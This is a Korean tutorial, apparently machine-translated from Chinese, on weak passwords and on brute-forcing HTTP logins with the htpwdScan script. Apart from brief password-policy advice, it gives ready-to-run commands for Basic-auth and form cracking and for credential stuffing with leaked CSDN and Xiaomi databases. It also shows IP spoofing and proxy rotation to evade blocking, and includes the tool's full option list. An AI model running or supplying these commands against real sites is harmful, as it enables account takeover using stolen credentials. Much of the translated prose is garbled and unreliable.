인터페이스 취약점
저자 : 왕 유양
시간 : 2019년 6월 7일
약한 암호
약한 암호 종종 큰 피해 약한 암호는 추측하거나 사람을 균열 암호 도구를 균열 일반적으로 쉽게 말합니다.
약한 암호 위험 :
- 공격자는 쉽게 약한 암호 또는 시스템 관리 페이지에서 입력하고 궁극적으로 제어 권한의 목적을 달성 할 수
- 당신은 약한 암호에 의해 사람의 친척의 계정 권한을 얻을 수 있습니다
데이터 보호 및 사실 약한 암호, 투명한 정보의 사용.
가장 일반적인 약한 암호 :
퍼즈 약한 암호 : HTTPS : //github.com/TheKingOfDuck/fuzzDicts
"+ 케이스 + 디지털 + 문자 기호"상대적으로 안전한 암호 정책 : 네트워크 전문가의 조언이다
일부 암호 제안 :
- 순수한 디지털 암호 정책 등 NA
- 암호 정책으로 간단한 디지털 논리 연속 정규, 문자, 기호의 조합을 사용하지 않고
- 암호는 최소 8이어야한다
- 정책의 네 가지 문자 유형
- 암호를 생략 컨텐츠 등 다른 이름을 포함하지 마십시오
인터페이스 취약점 : HTTP 암호 발파
htpwdScan : HTTP 폭파, 스크립트 라이브러리 충돌
htpwdScan : 서면 파이썬 HTTP 짐승을 기반으로, 공격 스크립트 라이브러리 충돌
- 지원 배치 확인 및 수입 HTTP3 에이전트는 낮은 명중 라이브러리는 성공적으로 웹 애플리케이션 방화벽의 대부분을 우회 사이트의 대부분을 공격 할 수있다
- 소셜 네트워크 라이브러리를 유출에 직접 액세스 라이브러리는 히트 공격을 개시
- 큰 사전을 가져 오기위한 지원
htpwdScan의 간단한 예
HTTP 기본 인증
htpwdScan.py -u = HTTP : //auth.58.com/ - 기본 User.txt를 password.txt를
가져 오기 사용자 이름과 암호는 사전에
양식 균열
htpwdScan.py -f post2.txt -d 사용자 = User.txt를 passwd를 = password.txt를 -ERR = "성공"거짓 "
post2.txt에서 가져 오기, User.txt를 password.txt를 암호 사전 파일을 저장 HTTP 패키지, 사용자를 붙잡고 passwd에 매개 변수를 해독 할 필요가있다
성공 "거짓 실패 마커 선택, 태그는 큰 따옴표 경우, 슬래시와 함께 탈출을 기억하시기 바랍니다
매개 변수 균열 GET
htpwdScan.py -d passwd를 = password.txt를 -u = "http://xxx.com/index.php?m=login&username=test&passwd=test"-get -ERR = "성공"거짓 "
여기에 스크립트가 알려줍니다 -get 매개 변수를 사용하는 것은 GET 요청입니다
공격 히트 라이브러리
"\ S + (\ S +) (\ S +)"-ERR = -fip htpwdScan.py = -f post.txt -database 로그인 명, passwd를 xiaomi.txt -regex = = "사용자 이름과 패스워드가 올바르지는"
htpwdScan.py = -f post.txt -database passwd에, 로그인 명 = csdn.net.sql -regex = \ "를 S + # (\ S +) # (\ S +)은"-ERR = "사용자 이름과 패스워드가 올바르지"-fip
CSDN 라이브러리를 사용 기장 및 출시 공격은 라이브러리를했다. 캡처 HTTP 요청 post.txt입니다
-Regex 파라미터 설정 파라미터 (), 패킷 모드 호를 패킷을 요구 정규식의 파일로부터 추출된다
기장 데이터 열 형식
[email protected] xxxxxxx
, 즉(用户名)空白字符(密码)
(\S+)\s+(\S+)
두 번째 충전이 passwd를 가지고 비어 있지 않은 동안, 공백이 아닌 문자 작성 걸릴 로그인 명을 지정할 수있다데이터 형식의 CSDN 행
zdg # 12344321 # [email protected]
작성 긍정적 인 표현\S+ # (\S+) # (\S+)
첫 번째 비어 있지 않은 문자열 # 작성 passwd를 한 후, 두 번째 충전 로그인 명 번호의 공백이 아닌 후
주문 매개 변수가 중요합니다
-fip 임의의 IP가 활성화 위조
HTTP 프록시 확인
htpwdScan.py -f = post.txt -proxylist = proxies.txt -checkproxy -suc = "사용자 이름이나 암호가 잘못"
사이트를 중단하려면 연결 대상 사이트, post.txt를 저장하는 HTTP 요청이 다음 -suc가 표시되어 통신 매개 변수를 설정 여부를 프록시 배치 테스트를 사용
간단하고 실용적인 방법을 확인합니다 :
htpwdScan.py -u = HTTP : //www.baidu.com -get -proxylist = available.txt -checkproxy -suc = "百度 一下"
전체 매개 변수 설명
스크립팅 지원 더 작은 기능, 인내는 아래 전체 지침을 읽어주십시오. 제안 된 멀티 사용
-debug
이 문제가, 아무 문제가 다음 실제 균열을 시작하는 경우 매개 변수는 HTTP 요청을 볼 수 있습니다.
usage: htpwdScan.py [options]
* An HTTP weak pass scanner. By LiJieJie *
optional arguments:
-h, --help 显示帮助
Target:
-u REQUESTURL 设定目标URL, 示例.
-u="https://www.test.com/login.php"
-f REQUESTFILE 从文件导入HTTP请求
-https 当从文件导入HTTP请求时,启用https(SSL)
-get 使用GET方法,默认: POST
-basic [ ...] HTTP Basic 暴力破解.
示例. -basic users.dic pass.dic
Dictionary:
-d Param=DictFile [Param=DictFile ...]
为参数设定字典文件,
支持哈希函数如 md5, md5_16, sha1.
示例. -d user=users.dic pass=md5(pass.dic)
Detect:
-no302 无视302跳转, 默认302敏感
-err ERR [ERR ...] 响应文本的破解失败标记,
示例. -err "user not exist" "password wrong"
-suc SUC [SUC ...] 响应文本中的破解成功标记,
e.g. -suc "welcome," "admin"
-herr HERR 响应HTTP头的破解失败标记
-hsuc HSUC 响应HTTP头的破解成功标记
-rtxt RetryText 响应文本中的重试标记,出现则重试请求,
示例. -rtxt="IP blocked"
-rntxt RetryNoText 响应文本中的重试标记,未出现则重试请求,
示例. -rntxt="<body>"
-rheader RetryHeader 响应头中的重试标记,出现则重试请求,
示例. -rheader="Set-Cookie:"
-rnheader RetryNoHeader
响应头中的重试标记,未出现则重试请求,
示例. -rheader="HTTP/1.1 200 OK"
Proxy and spoof:
-proxy Server:Port 设定少量HTTP代理
示例. -proxy=127.0.0.1:8000,8.8.8.8:8000
-proxylist ProxyListFile
从文件批量导入HTTP代理,
示例. -proxylist=proxys.txt
-checkproxy 检查代理服务器的可用性.
可用代理输出到 001.proxy.servers.txt
-fip 生成随机X-Forwarded-For欺骗源IP
-fsid FSID 生成随机session ID. 示例. -fsid PHPSESSID
-sleep SECONDS 每次HTTP结束,等待SECONDS秒,
避免IP被临时屏蔽,进入黑名单
Database attack:
-database DATABASE 导入社工库中的数据.
示例. -database user,pass=csdn.txt
-regex REGEX 从社工库中提取数据的正则表达式,必须分组.
示例. -regex="(\S+)\s+(\S+)"
General:
-t THREADS 工作线程数,默认50
-o OUTPUT 输出文件. 默认: 000.Cracked.Passwords.txt
-debug 进入debug模式检查HTTP请求和HTTP响应
-nov 只显示破解成功的条目,不显示进度
-v show program's version number and exit
스크립트 설치 패키지 분석
린 디렉토리
- cmdline.py : 무결성을 확인, 명령 줄 매개 변수를 구문 분석
- console_width.py : 폭 컴퓨터 단말, 적응 출력
- encodings.py : 플랫폼에 따라 부호화 및 복호화
- proxy.py : 수입 HTTP 프록시
- queue.py : 큐 사전 생성
- request_fil.py : 텍스트 파일을 구문 분석하고 HTTP 요청 가져 오기를 구문 분석
- request.py : 시작 HTTP 요청, HTTP 응답 결정 로직의 분석
DICT 디렉토리
- 디렉토리는 암호 파일 디렉토리입니다
발파 암호 페이지 BurpSuite
- 트림 소프트웨어는 무력을 사용할 수 있습니다